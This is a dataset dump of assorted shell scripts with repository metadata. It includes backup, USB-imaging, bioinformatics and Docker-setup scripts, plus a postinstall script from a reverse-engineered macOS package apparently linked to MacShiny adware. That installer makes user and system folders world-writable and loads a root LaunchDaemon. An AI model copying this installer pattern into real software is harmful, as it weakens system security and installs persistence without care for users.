echo "$(date) $FILE_NAME Start"
echo "$(date) $FILE_NAME Archive"
cd ${FOLDER}
tar -cv * | gpg -c --cipher-algo ${CIPHER_ALGORITHM} --verbose --passphrase ${PASSWORD} -o ${ROOT_NAME}"/"${FINAL_NAME}
# zip -0 -P ${PASSWORD} -r $FILE_NAME *
# rar a -s -ep1 -m0 -hp${PASSWORD} $FILE_NAME *
cd ${ROOT_NAME}
echo "$(date) $FILE_NAME Upload"
rsync -Pha --bwlimit=${BANDWIDTH_LIMIT} ${FINAL_NAME} ${SERVER_PATH}
echo "$(date) $FILE_NAME Removing Sync folder content and file"
rm -rf ${FOLDER}/* ${FINAL_NAME}
echo "$(date) $FILE_NAME Finished"
| true |
16e10271dc397673726913f0028099cd4f9d9e2a | Shell | paulpierre/MacShiny-Reversed | /Double click to install.pkg_/MacShinyFull-SOURCE/InstallGS/InstallGS.pkg/postinstall | UTF-8 | 7,718 | 2.71875 | 3 | [] | no_license | #!/bin/sh
# postinstall.sh
echo "Presets\scripts\gsScripts\postinstall"
echo "PID: $$; PPID: $PPID; Args: $(ps -o args= $$)"
if [ -f "/tmp/.cyanDebug/_enableInstallScriptTrace" ]; then
set -x
fi
########################### Sending Last Logs >>
#sendLastLogsScriptPath="/Library/Application Support/CyanSoft/gsservice/.SendLastLogs.sh"
#if [ -f "$sendLastLogsScriptPath" ]; then
# chmod 555 "$sendLastLogsScriptPath"
# echo "Launch last logs sending task"
# #launch last logs sennding task. It will be executed event if installer is killed
# nohup sh "$sendLastLogsScriptPath" &
#fi
############################################# <<
USER=`ls -la /dev/console | cut -d " " -f 4`
echo "user:$USER"
echo "SUDO_USER:$SUDO_USER"
USER_NOT_ROOT=`ls -la /dev/console | fgrep -v "root" | cut -d " " -f 4`
echo "USER_NOT_ROOT:$USER"
USER_LOGIN_WIN=$(ps auxwww | fgrep -v "fgrep /System" | fgrep /System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow | awk '{print $1}')
echo "USER_LOGIN_WIN:$USER_LOGIN_WIN"
echo "ls console:"
ls -la /dev/console
echo "stat:"
stat -f "%Su" /dev/console
echo "chown+chmod -R $USER:staff /Library/Application Support/CyanSoft/gsservice/GSService.app"
chown -R "$USER":staff "/Library/Application Support/CyanSoft/gsservice/GSService.app"
chmod -R 777 "/Library/Application Support/CyanSoft/gsservice/GSService.app"
echo "mkdir+chmod /Library/Application Support/CyanSoft/gsservice/clients"
mkdir "/Library/Application Support/CyanSoft/gsservice/clients"
chmod 777 "/Library/Application Support/CyanSoft/gsservice/clients"
chmod 777 "/Library/Application Support/CyanSoft/"
echo "mkdir /Library/Logs"
mkdir "/Library/Logs"
echo "mkdir+chmod /Library/Logs/CyanSoft"
mkdir "/Library/Logs/CyanSoft"
chmod 777 "/Library/Logs/CyanSoft"
echo "mkdir: /Users/$USER"
mkdir "/Users/$USER"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER"
chmod 777 "/Users/$USER"
fi
echo "mkdir: /Users/$USER/Library"
mkdir "/Users/$USER/Library"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/Library"
chmod 777 "/Users/$USER/Library"
fi
echo "mkdir: /Users/$USER/Library/Logs"
mkdir "/Users/$USER/Library/Logs"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/Library/Logs"
chmod 777 "/Users/$USER/Library/Logs"
fi
echo "mkdir+chmod: /Users/$USER/Library/Logs/CyanSoft"
mkdir "/Users/$USER/Library/Logs/CyanSoft"
chmod 777 "/Users/$USER/Library/Logs/CyanSoft"
echo "mkdir: /Users/$USER/.mono"
mkdir "/Users/$USER/.mono"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/.mono"
chmod 777 "/Users/$USER/.mono"
fi
echo "mkdir: /Users/$USER/.mono"
mkdir "/Users/$USER/.mono"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/.mono"
chmod 777 "/Users/$USER/.mono"
fi
echo "mkdir+chmod: /Library/Preferences/.5C0031D5-71DD-4BF2-BBB2-428ED1968258"
mkdir "/Library/Preferences/.5C0031D5-71DD-4BF2-BBB2-428ED1968258"
chmod 777 "/Library/Preferences/.5C0031D5-71DD-4BF2-BBB2-428ED1968258"
#######################Installing Momi.framework
echo "Installing Momi.framework"
mv -f "/Library/Application Support/CyanSoft/gsservice/Momi.framework.zip" "/Library/Frameworks/Momi.framework.zip"
rm -rf "/Library/Frameworks/Momi.framework"
unzip "/Library/Frameworks/Momi.framework.zip" -d "/Library/Frameworks"
rm -rf "/Library/Frameworks/Momi.framework.zip"
chmod -R 555 "/Library/Frameworks/Momi.framework"
# MomiRestoreLinks.sh:
momiRoot="/Library/Frameworks/Momi.framework/Versions/3.12.1"
linkMomiFile()
{
# $1 - original file
# $2 - link file
# additional '-h -f' for postinstall
ln -s -h -f "${momiRoot}/$1" "${momiRoot}/$2"
local errorCode=$?
if [ $errorCode != 0 ]; then
echo "Error $errorCode creating link for ${momiRoot}/$1"
# exit 1 - not for postinstall!
fi
}
linkMomiFile "lib/libmonoboehm-2.0.1.dylib" "lib/libmono-2.0.1.dylib"
linkMomiFile "lib/libmonoboehm-2.0.1.dylib" "lib/libmono-2.0.dylib"
linkMomiFile "lib/libmonoboehm-2.0.1.dylib" "lib/libmonoboehm-2.0.dylib"
linkMomiFile "lib/libsqlite3.0.8.6.dylib" "lib/libsqlite3.0.dylib"
linkMomiFile "lib/libsqlite3.0.8.6.dylib" "lib/libsqlite3.dylib"
linkGacDll()
{
# $1 - subpath in lib/mono/gac/ folder
local dllName=$(basename $1)
linkMomiFile "lib/mono/gac/$1" "lib/mono/4.5/${dllName}"
}
linkGacDll "Mono.Data.Sqlite/4.0.0.0__0738eb9f132ed756/Mono.Data.Sqlite.dll"
linkGacDll "Mono.Posix/4.0.0.0__0738eb9f132ed756/Mono.Posix.dll"
linkGacDll "Mono.Security/4.0.0.0__0738eb9f132ed756/Mono.Security.dll"
linkGacDll "System/4.0.0.0__b77a5c561934e089/System.dll"
linkGacDll "System.Configuration/4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll"
linkGacDll "System.Core/4.0.0.0__b77a5c561934e089/System.Core.dll"
linkGacDll "System.Data/4.0.0.0__b77a5c561934e089/System.Data.dll"
linkGacDll "System.Drawing/4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll"
linkGacDll "System.IdentityModel/4.0.0.0__b77a5c561934e089/System.IdentityModel.dll"
linkGacDll "System.Net.Http/4.0.0.0__b03f5f7f11d50a3a/System.Net.Http.dll"
linkGacDll "System.Runtime.Serialization/4.0.0.0__b77a5c561934e089/System.Runtime.Serialization.dll"
linkGacDll "System.Runtime.Serialization.Formatters.Soap/4.0.0.0__b03f5f7f11d50a3a/System.Runtime.Serialization.Formatters.Soap.dll"
linkGacDll "System.Security/4.0.0.0__b03f5f7f11d50a3a/System.Security.dll"
linkGacDll "System.ServiceModel/4.0.0.0__b77a5c561934e089/System.ServiceModel.dll"
linkGacDll "System.ServiceModel.Activation/4.0.0.0__31bf3856ad364e35/System.ServiceModel.Activation.dll"
linkGacDll "System.Transactions/4.0.0.0__b77a5c561934e089/System.Transactions.dll"
linkGacDll "System.Web/4.0.0.0__b03f5f7f11d50a3a/System.Web.dll"
linkGacDll "System.Web.ApplicationServices/4.0.0.0__31bf3856ad364e35/System.Web.ApplicationServices.dll"
linkGacDll "System.Web.Extensions/4.0.0.0__31bf3856ad364e35/System.Web.Extensions.dll"
linkGacDll "System.Web.Services/4.0.0.0__b03f5f7f11d50a3a/System.Web.Services.dll"
linkGacDll "System.Xml/4.0.0.0__b77a5c561934e089/System.Xml.dll"
linkGacDll "System.Xml.Linq/4.0.0.0__b77a5c561934e089/System.Xml.Linq.dll"
##################################################
echo "install pList"
#install pList
cp -p "/Library/Application Support/CyanSoft/gsservice/com.cyan.GSService.plist" "/Library/LaunchDaemons/com.cyan.GSService.plist"
chown root:wheel "/Library/LaunchDaemons/com.cyan.GSService.plist"
chmod 644 "/Library/LaunchDaemons/com.cyan.GSService.plist"
chown "$USER":staff "/Library/Application Support/CyanSoft/gsservice"
createSignalFile()
{
# $1 - signal file path
echo "createSignalFile: $1"
touch "$1"
chmod 777 "$1"
chown "${USER}":staff "$1"
}
# former Installation.txt
# !create signal file BEFORE launchctl!
createSignalFile "/tmp/.sig_CyanSoft_GSService_installPending"
#OTs an ability to prevent a loading of GSService for testing
if [ ! -f "/Users/${USER}/Desktop/Testing/GSService/DisableGSService.txt" ]
then
echo "launchctl load GSService.plist"
launchctl load -wF "/Library/LaunchDaemons/com.cyan.GSService.plist"
else
echo "DisableGSService.txt"
fi
echo "mkdir: /Users/$USER/Library/Application Support"
mkdir "/Users/$USER/Library/Application Support"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/Library/Application Support"
chmod 777 "/Users/$USER/Library/Application Support"
fi
echo "mkdir+chown+chmod: /Users/$USER/Library/Application Support/MacShiny"
mkdir "/Users/$USER/Library/Application Support/MacShiny"
chown -R "$USER":staff "/Users/$USER/Library/Application Support/MacShiny"
chmod 777 "/Users/$USER/Library/Application Support/MacShiny"
#install RLogScript
mv -f "/Library/Application Support/CyanSoft/gsservice/RLogScript.sh" "/Library/Application Support/CyanSoft/RLogScript.sh"
chmod 777 "/Library/Application Support/CyanSoft/RLogScript.sh"
exit 0
| true |
c7ebfd0c6755503551c7fead996c25740877d197 | Shell | d-green/dcm4chee-cdw-raspberry | /gpiofs | UTF-8 | 2,284 | 3.375 | 3 | [] | no_license | #!/bin/bash
LOGFILE=/srv/dcm4chee-cdw/server/default/log/gpioisofs.log
gpiobutton=0 # pins 9/11
gpioled=2 # pins 13/14
waittime=60 # sec to blinking waiting
gpiosetup()
{
gpio mode $gpioled out
gpio mode $gpiobutton in
gpio mode $gpiobutton up #pullup resistor
}
gpiowaitbutton()
{
while [ `gpio read $gpiobutton` = 1 ]; do
sleep 0.1
done
while [ `gpio read $gpiobutton` = 0 ]; do
sleep 0.1
done
}
gpiotestbutton()
{
if [ `gpio read $gpiobutton` = 0 ]
then
sleep 0.2
if [ `gpio read $gpiobutton` = 0 ]
then
return 0
fi
fi
return 1
}
gpiolight_on()
{
gpio write $gpioled 1
}
gpiolight_off()
{
gpio write $gpioled 0
}
function gimmeusb {
while [[ `cat /proc/mounts |grep media | wc -l` = 0 && $waittime -gt 0 ]]; do
gpiolight_on
sleep 0.5
gpiolight_off
sleep 0.5
((waittime--))
gpiotestbutton
if [ "$?" -eq 0 ]
then
exit 1
# User pressed button to abort
fi
done
}
# main
for last; do true; done
argument=$last
gpiosetup
gpiolight_on
FLASH_SIZE=`du -s -k $argument |awk '{print $1*2+65535}'|bc`
LAST_SEC=`echo $FLASH_SIZE+2047|bc`
NEXT_START=`echo $FLASH_SIZE+2048|bc`
echo $argument >>$LOGFILE
start=$(date +%s.%N);
printf "Timestamp $start %d sectors " $FLASH_SIZE >>$LOGFILE
du -s -k $argument >>$LOGFILE
dd if=/dev/zero of=/tmp/flash.img bs=512 count=$FLASH_SIZE status=none
/sbin/losetup /dev/loop0 /tmp/flash.img
/sbin/mkfs -t vfat /dev/loop0 >>/dev/null
sleep 2
mount /dev/loop0 /mnt
tt=$(echo "$(date +%s.%N) - $start" | bc);
printf "Create image(dd) %fsec. " $tt >>$LOGFILE
cp -r $argument/* /mnt
umount /dev/loop0 &
wait
/sbin/losetup -D
tt=$(echo "$(date +%s.%N) - $start" | bc);
printf "Copy(cp) %fsec. " $tt >>$LOGFILE
parted -s -a none /dev/sda mklabel msdos >/dev/null
parted -s -a none /dev/sda unit s mkpart primary fat32 2048 $LAST_SEC >/dev/null
partprobe &
wait
mkfs -t vfat /dev/sda1 >/dev/null &
wait
dd if=/tmp/flash.img of=/dev/sda1 bs=512 count=$FLASH_SIZE status=none &
wait
tt=$(echo "$(date +%s.%N) - $start" | bc);
printf "Move image(dd) %fsec.\n" $tt >>$LOGFILE
rm /tmp/flash.img
parted -s -a none /dev/sda unit s mkpart primary fat32 $NEXT_START 100% >/dev/null
partprobe &
wait
mkfs -t vfat /dev/sda2 >/dev/null
sleep 2
gpiolight_off
exit 0
| true |
39742141521364fcda61e26c73ba06d23b4bebe5 | Shell | ievanh6/final-project-public | /scripts/06_trimmomatic.sh | UTF-8 | 943 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# trim paired end reads in parallel
# Info on the Trimmomatic tool available here:
# http://www.usadellab.org/cms/index.php?page=trimmomatic
# https://github.com/timflutre/trimmomatic
# Naupaka Zimmerman
# nzimmerman@usfca.edu
# November 6, 2017
# call script like so: "bash 06_trimmomatic.sh data/fastq/*_1.fastq"
# meant to run for paired reads based on name of forward
# read (ends in "_1.fastq"), which determines how variants of output are
# determined
# requires TruSeq3-SE.fa file with Illumina adapters to be in the directory
# this file is in the 'misc' folder for this project
# this set of parameters is a bit stricter than the defaults
# e.g. we're trimming any reads that drop below 15 in a window size of 4
for file in "$@"; do
TrimmomaticSE -threads 2 "$file" \
data/trimmed/"$(basename -s .fastq "$file")".trim.fastq \
ILLUMINACLIP:data/TruSeq3-SE.fa:2:30:10 LEADING:3 TRAILING:3 \
SLIDINGWINDOW:4:15 MINLEN:36 CROP:100 &
done
| true |
5d3421f4ec61985710fcb163d6fa5b4346118141 | Shell | HasanAbbadi/config | /scripts/pix/sxort | UTF-8 | 716 | 3.75 | 4 | [] | no_license | #!/bin/sh
bySize(){ du -ah | sort -h -r | cut -f2- | sed 1,2d | sxiv -t -; }
byName(){ ls | sxiv -t -; }
byType(){ ls -1 *.png ; ls -1 *.jpeg ; ls -1 *.jpg ; ls -1 *.gif | sxiv -t -; }
byTime(){ ls -t | sxiv -t -; }
Shuffle(){ ls | shuf | sxiv -t -; }
helpMe(){
echo "Please provide an argument:
--size | -s ) bigger --> smaller
--name | -n ) alphabetical order a-z
--type | -t ) png > jpeg > jpg > gif
--time | -l ) last modified
--shuf | -r ) random order
--help | -h ) this help message"
}
case "$1" in
--size | -s) bySize ;;
--name | -n) byName ;;
--type | -t) byType ;;
--time | -l) byTime ;;
--shuf | -r) Shuffle ;;
--help | -h | "") helpMe ;;
esac
| true |
0c369834ee2f877c753742e5f3e370533396f34f | Shell | gabrielplicks/planutils | /planutils/packages/TEMPLATE/install | UTF-8 | 459 | 3.09375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# No need to install planutils dependencies
# No need to check if already installed
# The install script will be run from the package's directory
# To use if root is required
#[ "$UID" -eq 0 ] || (echo "installation requires root access"; exec sudo "$0" "$@")
# Install general linux dependencies
# General setup / configuration
# Recipe for singularity images
## Fetch the image
#singularity pull --name <image name> <singularity shub url>
| true |
3fe6cf1c33589eb5b7fe50b893bbbdd2f27aeb24 | Shell | NithyaKoka/FTP-Connection_data_migrations | /test.sh | UTF-8 | 169 | 3.0625 | 3 | [] | no_license | #!/usr/bin/env bash
cd #location
for d in */*.xml ; do
echo "Checking the xml file in $d directory for the contol characters"
perl -i -pe 's/[[:cntrl:]]//g' $d;
done | true |
cf418017632ccbf8cb12f39933d44e58b35de206 | Shell | cipek/xDrone | /scripts/setup.sh | UTF-8 | 707 | 2.578125 | 3 | [] | no_license | #! /bin/sh
sudo apt-get update
sudo apt-get -y update
sudo apt-get docker docker-engine docker.io
sudo add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo apt-get update
sudo apt-get install -y docker-ce
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
sudo apt install -y docker-compose
sudo groupadd docker
sudo gpasswd -a $USER docker
docker pull ros:kinetic-robot
docker build -t xdrone .
newgrp docker
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.